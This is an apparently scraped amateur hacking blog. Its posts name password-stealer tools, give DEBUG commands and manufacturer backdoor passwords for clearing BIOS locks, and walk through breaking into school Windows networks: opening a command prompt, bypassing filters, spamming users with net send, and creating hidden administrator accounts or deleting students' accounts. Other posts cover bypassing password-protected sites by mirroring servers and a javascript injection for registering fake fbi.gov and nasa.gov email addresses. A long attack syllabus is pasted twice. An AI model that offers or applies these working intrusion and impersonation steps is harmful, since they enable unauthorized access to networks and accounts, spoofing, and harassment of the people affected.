The following tools m gonna list now are some of the dangerous tools available on www, which may be used on u by an unethical hacker. I want you to be well aware of all the possibilities.

They are Free to download and it takes seconds to crush up personal computer if wired online, m not disclosing the links to these tools .

Lord PS
Lord PS is an editor that will create a password stealer/virus that emails you the passwords with tons of options, options may include taking over ur entire pc and disallowing u to access any of the files

Hosein PS v1.6
Does the same job with above with less options/features, another yahoo pass stealer

Fucker PS
This is a strong multi-password stealer that will grab passwords from all the most commonly used programs/services, msn, yahoo etc

JPS v1.8
Another password grabber/stealer - e mailer that is more focuced on Yahoo messenger

Demon PS v2.3
Yahoo messenger password stealer/mailer with anti virus kill options
and other system features

Tro messenger

The big Boss , used with Yahoo messenger lets u take over victims Pc


Many more exists,will be disclosing all of them
Even u can contribute
Posted by at 10 comments:

Find who is Invisible on Yahoo messenger

Find who is Invisible on Yahoo messenger
Just go to

http://www.invisible.ir

and enter victims Yahoo! ID… Click go and you are done!
credit : site contributer :

it works !!

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:

Find who is Invisible on Yahoo messenger - The Ethical Hacking 2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below.So you know that the user is online.

Find who is Invisible on Yahoo messenger - The Ethical Hacking


Alternate Method:

Chose a person you want to check .Double click to open the chat window.Now simply invite the person for a voice conference.This is done by clicking on the "conference' button on the top of the chat window.
If the talk button appears and turns green then that person is online.But if you receive the message 'Voice chat could not be started ' then the person is offline.

Note:Some people use softwares like buddy spy to check who is invisible.I DONT RECOMMEND you to use such third party softwares as they can expose your Pc to hackers by sending your personal information and can even steal information from your Pc.So avoid such softwares and instead use the simple tricks given above.

If you have any queries or would like to make some useful contribution to this topic feel free to drop a line in the comments section.
Posted by at 1 comment:

Some damn things

Anonymizers and Remailers !! What n How


Anonymizers are online services that eliminate the trail of information that you leave behind, whilst surfing, so that your online activities cannot be traced back to you. The anonymizers vary in sophistication depending on the level of security and number of features that you require. Some anonymizers require the use of client software and others only require that you log onto their website before browsing other sites*.


How do Anonymizers work?



You essentially surf the Web through the anonymizer site, going to that site first and then routing all your pages from there. When you send a page request through the anonymizer, it acts like a super-proxy server, stripping off the header of each data packet, thus making your request anonymous. The requested page is then fed through the anonymizer back to your Web browser**.



In order to avoid being tracked, one can use an anonymous proxy to surf the web. An anonymous proxy makes sure your IP address does not get stored on the web server logs. Web servers log every ?GET? request made, together with date, hour, and IP. But if you are accessing the Internet through a proxy server, then the IP of the proxy is logged and not yours.
In case you do not go through an anonymous proxy, then you are actually risking vital information that belongs to you. For example, a hacker can easily find out your IP Address, your web browser, your Operating System and even the previous URL that you have visited. You can also be easily located geographically (provided one has the necessary software tools) because people can find out a whole lot of things that give your location. Like your hostname, your continent, your country, your city and even your Internet Service Provider.
Consider the scenario where a hacker gets access to your computer, he can find out your name, email address, telephone number, various user ID's and passwords, details about software you use and your preferences, locations of files and folders, the search strings that you used and literally hundreds of other personal things. All this information is stored in files like SYSTEM.ini, USER.dat, SYSTEM.dat etc. One very important file is the nsform??.TMP which stores all the data inside every Netscape form you've ever submitted, with and without SSL, when the submission failed or was cancelled.


What are Re-mailers?



Anonymous Re-mailers are services used to send e-mail messages, so that the recipient of the e-mail cannot determine the identity of the sender. Re-mailers strip off header information leading to the identity of the sender and often route a message through a chain of re-mailers before reaching the recipient. Many re-mailers also include some sort of message based encryption. Re-mailers are commonly used to protect the anonymity if the sender from the recipient, to prevent eavesdropping by a third party, or to post anonymously to newsgroups*.

How do Re-mailers Work?



An anonymous re-mailer is simply a computer connected to the Internet that forwards electronic mail or files to other addresses on the network. It also strips off the "header" part of the messages, which shows where they came from and who sent them. All the receiver can tell about a message's origin is that it passed through the re-mailer. Some re-mailers also allocate each sender an "anonymous ID", rather like a PO Box number, which it stores with the sender's address so that any replies reach them.***


All re-mailers are fairly effective at what they do and some even take an extra step and add encryption to all outgoing messages. In order to view header information sent via email messages in Outlook Express, select a message in your inbox, then select File | Properties | Details.
To view header information in m*c*s*t Outlook, right-click a message in your inbox and select Options; the header information is displayed in the Internet Headers area of the Message Options dialog box.

Anonymous re-mailers were invented by security experts interested to know whether it was possible to send a message on the Internet which could not be traced back to its source. As soon as the first ones were built, though, people found a more pragmatic use for them: to send messages to bulletin boards about subjects so sensitive that they did not want their names known.

Clear BIOS Password, All tricks !




**** New Trick **** :

At command prompt type debug
you will get a - prompt where you can type the fallowing ( means hit enter, not type enter*)

A
MOV AX,0
MOV AX,CX
OUT 70,AL
MOV AX,0
OUT 71,AL
INC CX
CMP CX,100
JB 103
INT 20
just hit enter on this line
G
Q

Basic BIOS password crack - works 9.9 times out of ten

This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.



Accessing information on the hard disk



When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.



Standard BIOS backdoor passwords


The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.



Flashing BIOS via software


If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.


Flashing BIOS via hardware


If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.


Using the jumpers

The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.

To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.

If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.

If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery

If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.

Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.
Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.


Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)


Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
80 51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26


Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.

The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13

NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.


Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd


Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13



Replacing the chip


If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.


Important
Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .



Key Disk for Toshiba laptops


Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.


Key protected cases


A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

That's all.

Clear Cmos, jumper.That is the way how I solve problem when customer forgets password.


More

There are a few different ways to reset the cmos, here's a few:

1. there are many default common passwords,
such as:

At boot-up note the BIOS provider (Award, AMI, Phoenix, IBM, etc.)

For Award BIOS' try these backdoor passwords:

AWARD_SW
j262
HLT
SER
SKY_FOX
BIOSTAR
ALFAROME
Lkwpeter
j256
AWARD?SW
LKWPETER
syxz
ALLy
589589
589721
awkward
CONCAT
d8on
CONDO
j64
szyx

For AMI BIOS' try these backdoor passwords:

AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
A.M.I.
CONDO


For PHOENIX BIOS' try this backdoor password:

phoenix

there are too many to count here's a list
http://www.phenoelit.de/dpl/dpl.html
(search for PC BIOS)


2. On some older PC's pressing the insert key upon startup will clear
the CMOS, make sure you hold it down till it's done booting.

3. Another way which we pretty much already covered, was to pull the
metallic nickel looking battery that supplies power to the CMOS.

4. Some times there is a small three pin jumper used to reset the bios,
just move the black little pin cover to the opposite two pins.
(Make sure to read the motherboards manual before this)

5. If the battery is soldered in you can take a soldering iron to it but
I don't recommend it unless you are a professional.

6. there are a few programs out on the net which are made to crack
certain types of bios passwords, I have one for award BIOS's here's a
couple:

http://www.11a.nu/ibios.htm

http://natan.zejn.si/rempass.html

Good reading:
http://www.astalavista.com/library/...ios_hacking.txt


http://www.virtualplastic.net/html/misc_bios.html



Hacking your School, College


getting over the blocked sites

u can try google translator .. or one proxy which i found intresting was greenpips.com try that or . try this http://64.233.179.104/translate_c?hl=de&ie=UTF-8&oe=UTF-8&langpair=de%7Cen&u=http://www.your website.com/ change the last part to the website you like to access

contributed by
Muhajir.K.M

Hacking at school

This tutorial is aimed at school servers running Windows underneath (most of them do). It works definitely with Windows 98, 2000, Me, and XP. never tried it with 95, but it should work anyway. However, schools can stop Batch files from working, but it is very uncommon for them to be that switched on.


There are problems with school servers, and they mostly come back to the basic architecture of the system - so the admins are unlikely to do anything about it! In this article I will discuss how to bypass web filtering software at school, send messages everywhere you want, create admin accounts, modify others' accounts, and generally cause havok. Please note that I ahve refrained from giving away information that will actually screw up your school server, though intelligent thinkers will work it out. THis is because, for god sakes, this is a school! Don't screw them up!


How to get it all moving


An MS-DOS prompt is the best way to do stuff, because most admins don't think its possible to get them and, if they do, they just can't do anything much about it.

First, open a notepad file (if your school blocks notepad, open a webpage, right click and go to view source. hey presto, notepad!). Now, write

command.com

and save the file as batch.bat, or anything with the extension .bat . Open this file and it will give you a command prompt:) (for more information on why this works, look to the end of the article). REMEMBER TO DELETE THIS FILE ONCE YOU'VE FINISHED!!! if the admins see it, they will kill you;)


Bypassing that pesky web filtering


Well, now you've got a command prompt, it's time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I'm going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.

in your command prompt, type

ping hackthissite.org

or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, preceded by http://, and you'll be able to access the page!

For example: http://197.57.189.10 etc.

Now, I've noticed a lot of people have been saying that there are other ways to bypass web filtering, and there are. I am only mentioning the best method I know. Others you might want to try are:

1) Using a translator, like Altavista's Babel fish, to translate the page from japanese of something to english. This will bypass the filtering and won't translate the page, since it's already in English.

2) When you search up the site on Google, there will be a link saying 'Cache'. Click that and you should be on.

3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart's content:)



Sending messages out over the network



Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send * "The server is h4x0r3d"

*Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*

Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Varndean * "The server is h4x0r3d"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"

use commas to divide the names and NO SPACES between them.



Adding/modifying user accounts



Now that you have a command prompt, you can add a new user (ie yourself) like so

C:>net user username /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:

C:>net user username password /ADD

where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'

C:>net user JohnSmith fruity /ADD

Right then, now that we can create accounts, let's delete them:)

C:>net user JohnSmith /DELETE

This will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them:)

Let's give you admin priveleges:)

C:>net localgroup administrator JohnSmith /ADD

This will make JohnSmith an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

You can list all the localgroups by typing

C:>net localgroup

Running .exe files you can't usually run

In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.

Well, I hope this article helped a bit. Please vote for me if you liked it:) Also, please don't go round screwing up your school servers, they are providing them free to you to help your learning.

I will add more as I learn more and remember stuff (I think I've left some stuff out - this article could get very long...)
Posted by at No comments:

Hacking Pssword Protected Website's

warning : For educational purpose only

i know dis is lame but just would like to share wid u.
have nothing for next half an hour so typing it.. lol

here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.

We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.
Posted by at 1 comment:

hack ??

Get ur unique msn account

//Not actice now
this thread will be erased in some days

try something new www.deadfake.com annms mail




Popular

* Get your Own Unique msn account @"whateveryouwant"


Get your Own Unique msn account @"whateveryouwant"


There are two ways ..

the first simple one is to go to https://accountservices.passport.net/reg.srf?fid=RegCredOnlyEASI&sl=1&vv=410&lc=1033

and continue registering from here .. this is the easy way ...

Now the ELITE waY



1. Goto http://get.live.com/getlive/overview to start registering your windows live account.

2. Press the sign-up button and you will be presented a form to sign up for a hotmail account.

3.Copy the following javascript injection code:


javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="md5this.");r(a = new Array("hotmail.com","fbi.gov","nasa.gov",d+"com",d+"com.au",d+"be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/*md5this.com*/,d+"nl")); for (i=0;i


4. Paste the code in your address bar (you know, that thing you normally type www.sainathgupta.tk .

5. Hit enter, if all went well it should show a message box telling you "Success - additional domains added!".

6.Now you can select a multitude of domains, fill out the form and you are ready to go!

Now you have a New msn account to scare your friends out

play with it ... enter a @whatever you want chat with people .. scare them



beyond that


javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="toxic.");r(a = new Array("hotmail.com","csthis.com","nasa.gov","fbi.gov","iknowwhatyoudidlastsummer.info",d+"com",d+"com.au",d+"be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/*csthis.com*/,d+"nl")); for (i=0;i


and here is more .....



https://account.live.com/MessagePage.aspx?lc=1033&message=SIconfirmed¶m=%69%68%61%63%6B%65%64%40%6E%61%73%61%2E%67%6F%76%0A
Posted by at No comments:

hacking sylabus

Well many one ask this as what to study as a curriculum for Ethical hacking..
hmm well i made dis generalized mannual fr u guys. may help a lot


• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2007 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol
(SNMP)

• Introduction to Remote Exploits
• Engineering remote exploits
• Running shellcode in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in
Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses


Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call
Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in
Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus

Modifying syslog entries
• Raw binary editing to prevent forensic
investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain
Impersonation
• Impersonation of other Users- Hijacking kernel
tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS

Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS

Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks

Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image
files
• Attacking email vectors (Lotus Notes and
Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords

• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003
& Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with cover channels through IPSec VPNs
• Hijack and capture SSL traffic


Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an
organization
• Inspect changes to whois record over last 3
years
• Windows 2003 Server & Vista DNS Cache
Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP
Well many one ask this as what to study as a curriculum for Ethical hacking..
hmm well i made dis generalized mannual fr u guys. may help a lot


• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2007 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol
(SNMP)

• Introduction to Remote Exploits
• Engineering remote exploits
• Running shellcode in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in
Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses


Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call
Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in
Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus

Modifying syslog entries
• Raw binary editing to prevent forensic
investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain
Impersonation
• Impersonation of other Users- Hijacking kernel
tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS

Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS

Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks

Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image
files
• Attacking email vectors (Lotus Notes and
Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords

• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003
& Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with cover channels through IPSec VPNs
• Hijack and capture SSL traffic


Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an
organization
• Inspect changes to whois record over last 3
years
• Windows 2003 Server & Vista DNS Cache
Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP
Posted by at No comments:

Miscellonous

Make Ultra Strong Passwords
A very good One from Irongeek.
Strong Article Worth Sharin


